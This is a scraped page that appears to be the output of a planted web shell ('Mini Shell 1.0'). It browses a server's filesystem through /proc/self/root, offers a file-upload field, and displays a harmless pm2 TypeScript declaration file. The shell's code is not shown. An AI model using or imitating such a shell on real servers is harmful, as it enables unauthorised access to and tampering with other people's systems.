HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/local/lib/node_modules/pm2/node_modules/@pm2/io/build/main/
Upload File :
Current File : //proc/self/root/usr/local/lib/node_modules/pm2/node_modules/@pm2/io/build/main/featureManager.d.ts
import { IOConfig } from './pmx';
export declare function getObjectAtPath(context: Object, path: string): any;
export declare class FeatureManager {
    private logger;
    init(options: IOConfig): void;
    get(name: string): Feature;
    destroy(): void;
}
export declare class FeatureConfig {
}
export interface Feature {
    init(config?: any): void;
    destroy(): void;
}